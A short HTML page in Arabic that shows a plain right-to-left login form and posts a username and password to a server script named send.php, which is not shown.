<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
  <title>تسجيل الدخول</title>
</head>
<body style="font-family: Tahoma; direction: rtl; text-align: center; margin-top: 100px;">
  <h2>تسجيل الدخول</h2>
  <form method="POST" action="send.php">
    <label>اسم المستخدم:</label><br>
    <input type="text" name="username" required><br><br>

    <label>كلمة المرور:</label><br>
    <input type="password" name="password" required><br><br>

    <button type="submit">تسجيل الدخول</button>
  </form>
</body>
</html>